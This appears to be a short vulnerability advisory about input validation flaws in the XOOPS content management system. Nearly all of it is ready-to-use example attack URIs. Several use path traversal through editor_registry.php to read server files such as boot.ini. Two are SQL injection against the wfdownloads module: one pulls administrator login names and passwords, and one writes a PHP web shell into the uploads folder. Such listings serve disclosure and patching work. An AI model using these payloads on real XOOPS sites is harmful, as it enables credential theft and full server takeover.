|
XOOPS Multiple Input Validation Vulnerabilities
No exploit is required. Example URIs have been provided: http://www.example.com/[path_to_xoops]/class/xoopseditor/textarea/editor_registry.php?xoopsConfig[lang uage]=../../../../../../../../../../script http://www.example.com/[path_to_xoops]/class/xoopseditor/textarea/editor_registry.php?xoopsConfig[lang uage]=../../../../../../../../../../boot.ini%00 http://www.example.com/[path_to_xoops]/class/xoopseditor/koivi/editor_registry.php?xoopsConfig[languag e]=../../../../../../../../../../script http://www.example.com/[path_to_xoops]/class/xoopseditor/koivi/editor_registry.php?xoopsConfig[languag e]=../../../../../../../../../../boot.ini%00 http://www.example.com/[path_to_xoops]/class/xoopseditor/dhtmltextarea/editor_registry.php?xoopsConfig [language]=../../../../../../../../../../script http://www.example.com/[path_to_xoops]/class/xoopseditor/dhtmltextarea/editor_registry.php?xoopsConfig [language]=../../../../../../../../../../boot.ini%00 http://www.example.com/[path_to_xoops]/modules/wfdownloads/viewcat.php?list=-'%20UNION%20SELECT%200,0, loginname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pass,0,0%20FROM%20fXZtr_users%20WHERE%20level=5/* http://www.example.com/[path_to_xoops]/modules/wfdownloads/viewcat.php?list=-1'%20or'a'='a'%20UNION%20 SELECT%200,0,0,'<?php%20system($_GET[cmd]);?>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0%20INTO%20OUTFILE%20'../../www/xoops/uploads/shell.php'%20FROM%20fXZtr_wfdownloads_downloads/* |
|
 Privacy Statement |
